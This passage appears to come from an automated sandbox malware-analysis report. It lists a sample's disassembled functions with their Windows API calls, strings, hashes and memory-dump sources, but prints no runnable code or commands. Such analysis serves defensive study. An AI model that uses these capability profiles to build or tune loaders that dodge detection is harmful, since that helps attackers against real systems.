                        • ShellExecuteExW.SHELL32(0000003C), ref: 00A0AEA3
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                        • GetProcessId.KERNEL32(00000000), ref: 00A0AF38
                        • CloseHandle.KERNEL32(00000000), ref: 00A0AF67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseExecuteHandleProcessShell_wcslen
                        • String ID: <$@
                        • API String ID: 146682121-1426351568
                        • Opcode ID: 05163564d136dbf3d921c964affc3a9567c696c01304d0159c17d56d66df50d2
                        • Instruction ID: e3c1a4245c796216ffdbe8175ce3918ec1761c546dc7c6dd3fabad1c9da7e8f4
                        • Opcode Fuzzy Hash: 05163564d136dbf3d921c964affc3a9567c696c01304d0159c17d56d66df50d2
                        • Instruction Fuzzy Hash: 8E717A71A00619DFCB14EF94D484A9EBBF0FF48314F148499E856AB792CB74ED41CBA1
                        Function 009E719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009E7206
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009E723C
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009E724D
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009E72CF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: 431bae32f41b19910e114e504401bdc6d3e1f8bc98130d614c9a6993f5d3af6a
                        • Instruction ID: ffe6bb2dceeb4f85c9367f64d46af19dd960f7850a4efd5e2018eff283ead365
                        • Opcode Fuzzy Hash: 431bae32f41b19910e114e504401bdc6d3e1f8bc98130d614c9a6993f5d3af6a
                        • Instruction Fuzzy Hash: A4419F71A04245EFDB16CF95C884B9ABBA9EF84310F1484A9BE059F30AD7B0DD41CBA1
                        Function 00A13D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A13E35
                        • IsMenu.USER32(?), ref: 00A13E4A
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A13E92
                        • DrawMenuBar.USER32 ref: 00A13EA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert
                        • String ID: 0
                        • API String ID: 3076010158-4108050209
                        • Opcode ID: 6ffd1b1a5a7399df1c548e77d4f4d796e38ab529fec2405dbb235a2d6292ca7c
                        • Instruction ID: 255c8f923a0bcb07e14885aacaab8611df78da46c6428823e964c89856f92669
                        • Opcode Fuzzy Hash: 6ffd1b1a5a7399df1c548e77d4f4d796e38ab529fec2405dbb235a2d6292ca7c
                        • Instruction Fuzzy Hash: 77410876A01309EFDF10DF94D884AEABBF9FF49364F044129E915A7290D730AE95CB50
                        Function 009E1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009E1E66
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009E1E79
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 009E1EA9
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen$ClassName
                        • String ID: ComboBox$ListBox
                        • API String ID: 2081771294-1403004172
                        • Opcode ID: 70e5497e3fe7b9e428b7872c2e9b89f33152af848c37606a4fc79494cca3309f
                        • Instruction ID: 9c35b9785022131bdc066f452b709da80fc24ec81b2267871b08de4a0eeea1dd
                        • Opcode Fuzzy Hash: 70e5497e3fe7b9e428b7872c2e9b89f33152af848c37606a4fc79494cca3309f
                        • Instruction Fuzzy Hash: E5212371A00144BFDB15ABB5CC49EFFB7B9EF85360B148519F826A72E1DB384D0A8720
                        Function 00A0C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: HKEY_LOCAL_MACHINE$HKLM
                        • API String ID: 176396367-4004644295
                        • Opcode ID: 98a0ac7beb2a557fb4abea95323d250cd99704d37c6e0a1c68cfaf2bcfa56c0b
                        • Instruction ID: 692e88e940c3623fd5ff57466fc6d4ac870b98bb2c6c1e92e0ce601086f2033d
                        • Opcode Fuzzy Hash: 98a0ac7beb2a557fb4abea95323d250cd99704d37c6e0a1c68cfaf2bcfa56c0b
                        • Instruction Fuzzy Hash: 7031D572B0016E4BCB20EF6CA8505BF73939BE17E0B154229E855AB3C5E671CE4593A0
                        Function 00A12F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A12F8D
                        • LoadLibraryW.KERNEL32(?), ref: 00A12F94
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A12FA9
                        • DestroyWindow.USER32(?), ref: 00A12FB1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyLibraryLoadWindow
                        • String ID: SysAnimate32
                        • API String ID: 3529120543-1011021900
                        • Opcode ID: 67540b6390a2d64f7d92c9896b7975764ab0ddb83de6898268355cf1a30f665d
                        • Instruction ID: 6651d5ce17af9d2f938a8370f4994ad32f53ad0f2155e8a3670f7111ffbee7c6
                        • Opcode Fuzzy Hash: 67540b6390a2d64f7d92c9896b7975764ab0ddb83de6898268355cf1a30f665d
                        • Instruction Fuzzy Hash: 16218C71204209ABEB209FA4DC84FFB77BDEB99364F104618F950D6190D771DCB29760
                        Function 009A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009A4D1E,009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002), ref: 009A4D8D
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009A4DA0
                        • FreeLibrary.KERNEL32(00000000,?,?,?,009A4D1E,009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000), ref: 009A4DC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: a92e5c82566d96527eab7dd5e3b43919713edcf74edc9c19bd73acdf8fc562da
                        • Instruction ID: 8416ef6afd8f6a5751c30f5cbe3dd7f4a01c6a3b7c20766a14ce29588e079991
                        • Opcode Fuzzy Hash: a92e5c82566d96527eab7dd5e3b43919713edcf74edc9c19bd73acdf8fc562da
                        • Instruction Fuzzy Hash: 8AF04435580218BBDB119F94DC49BDDBBB9EF85761F044164F805A6190CB759941CAD0
                        Function 00984E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E9C
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984EAE
                        • FreeLibrary.KERNEL32(00000000,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EC0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        • API String ID: 145871493-3689287502
                        • Opcode ID: 81612ea1894030b9bcc87f831065e64b07fc697b6584aed6e2aa41268b745ce8
                        • Instruction ID: 7feee1776254bbd97b3258ecd9e5fbda593bd3c39ed662de898b4a61f624d7a8
                        • Opcode Fuzzy Hash: 81612ea1894030b9bcc87f831065e64b07fc697b6584aed6e2aa41268b745ce8
                        • Instruction Fuzzy Hash: F1E0CD36AC55237BD2316B656C18B9F665CBFC1F737054215FC00E2301DB64CD0241A1
                        Function 00984E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E62
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984E74
                        • FreeLibrary.KERNEL32(00000000,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E87
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        • API String ID: 145871493-1355242751
                        • Opcode ID: c264ab2363bf0889ea0f13abf060f5ef0ab5e83c53bab4e55b02980419319f29
                        • Instruction ID: 94f03d3eb1c7e41a45f8e96f72439a544d6ef83d9bcd6769ec6bef958f9dc66c
                        • Opcode Fuzzy Hash: c264ab2363bf0889ea0f13abf060f5ef0ab5e83c53bab4e55b02980419319f29
                        • Instruction Fuzzy Hash: 45D0C23658262277CA222B247C08DCB2A1CBF81F313054610B801E2211CF24CD0282D1
                        Function 00A0A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 00A0A427
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A0A435
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A0A468
                        • CloseHandle.KERNEL32(?), ref: 00A0A63D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$CloseCountersCurrentHandleOpen
                        • String ID:
                        • API String ID: 3488606520-0
                        • Opcode ID: 8c086c7110193071ad6e6de33c3eb47fc13d4b334c5980f11385a3a76cebc8ed
                        • Instruction ID: 9aa4aca7a4f40219e1507c68bc0a2f018ee050ba711fa84e0bd599e90e4ab2e1
                        • Opcode Fuzzy Hash: 8c086c7110193071ad6e6de33c3eb47fc13d4b334c5980f11385a3a76cebc8ed
                        • Instruction Fuzzy Hash: F9A19271604300AFE720EF28D886F2AB7E5AF94714F14885DF55A9B3D2D771EC418B92
                        Function 009EE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ECF22,?), ref: 009EDDFD
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ECF22,?), ref: 009EDE16
                          • Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A
                        • lstrcmpiW.KERNEL32(?,?), ref: 009EE473
                        • MoveFileW.KERNEL32(?,?), ref: 009EE4AC
                        • _wcslen.LIBCMT ref: 009EE5EB
                        • _wcslen.LIBCMT ref: 009EE603
                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 009EE650
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                        • String ID:
                        • API String ID: 3183298772-0
                        • Opcode ID: cb0d7f68bb6a755deb66f324332ec5e23cc5cf4e94f684ab9265fd16b46e16cf
                        • Instruction ID: a1a49416dfc05210d6bf06c00746fc7843c65d70affd13ea63962942e924a75d
                        • Opcode Fuzzy Hash: cb0d7f68bb6a755deb66f324332ec5e23cc5cf4e94f684ab9265fd16b46e16cf
                        • Instruction Fuzzy Hash: 165173B24083859BC725EB90DC85AEFB3ECAFC5350F00491EF589D3191EF75A6888766
                        Function 00A0B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0BAA5
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0BB00
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A0BB63
                        • RegCloseKey.ADVAPI32(?,?), ref: 00A0BBA6
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0BBB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                        • String ID:
                        • API String ID: 826366716-0
                        • Opcode ID: b33d253369d085e47cf5a59a67d1580c2abda32871ecd8189a3fa4e6aeab9842
                        • Instruction ID: 3e3a2a54f159c52b17b8e6b75dfed78b0db6de24ef2f409a0d4cc4bb404dcdb7
                        • Opcode Fuzzy Hash: b33d253369d085e47cf5a59a67d1580c2abda32871ecd8189a3fa4e6aeab9842
                        • Instruction Fuzzy Hash: 0961BF31218205AFD314DF24D590F2ABBE5FF85348F14895CF49A8B2A2DB31ED45CBA2
                        Function 009E8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 009E8BCD
                        • VariantClear.OLEAUT32 ref: 009E8C3E
                        • VariantClear.OLEAUT32 ref: 009E8C9D
                        • VariantClear.OLEAUT32(?), ref: 009E8D10
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009E8D3B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType
                        • String ID:
                        • API String ID: 4136290138-0
                        • Opcode ID: 8b1de9c69cd7c85493fbe455cc4b5b6fcb5d4e24aaad0c39c718c11bc03504ad
                        • Instruction ID: 9458d7dc6bec4920f1953586f929d6925f41107e424c18d0038c3cb8a2672759
                        • Opcode Fuzzy Hash: 8b1de9c69cd7c85493fbe455cc4b5b6fcb5d4e24aaad0c39c718c11bc03504ad
                        • Instruction Fuzzy Hash: 385178B5A00659EFCB10CFA9C884AAAB7F9FF89310B158559F949DB350E730E911CF90
                        Function 009F8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                        Download Yara Rule
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009F8BAE
                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 009F8BDA
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009F8C32
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009F8C57
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009F8C5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String
                        • String ID:
                        • API String ID: 2832842796-0
                        • Opcode ID: 50468516a63b0817a5673af9693fa5f490b89b071e293a393745040e466600ae
                        • Instruction ID: 99bcf0d2cb9b1d54bea9200ca960cd985a6c0145c6952d4c6f9f26586b6a975a
                        • Opcode Fuzzy Hash: 50468516a63b0817a5673af9693fa5f490b89b071e293a393745040e466600ae
                        • Instruction Fuzzy Hash: 9E514035A002199FCB05EF54C881E6EBBF5FF49314F088458E949AB362DB35ED51CBA0
                        Function 00A08EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A08F40
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A08FD0
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A08FEC
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A09032
                        • FreeLibrary.KERNEL32(00000000), ref: 00A09052
                          • Part of subcall function 0099F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,009F1043,?,753CE610), ref: 0099F6E6
                          • Part of subcall function 0099F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,009DFA64,00000000,00000000,?,?,009F1043,?,753CE610,?,009DFA64), ref: 0099F70D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                        • String ID:
                        • API String ID: 666041331-0
                        • Opcode ID: f004a7aa46eba75f4d9f06a569e82fea61e4687f7f93a77591905cab586b96ae
                        • Instruction ID: b5679399c1e29943a75a4cf9e87693b24a105f893199d441c043e3a907ad754c
                        • Opcode Fuzzy Hash: f004a7aa46eba75f4d9f06a569e82fea61e4687f7f93a77591905cab586b96ae
                        • Instruction Fuzzy Hash: 5C514035604209DFC715EF68D4949ADBBF1FF49324B0880A8E8459B7A2DB31ED86CF91
                        Function 00A16B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A16C33
                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00A16C4A
                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A16C73
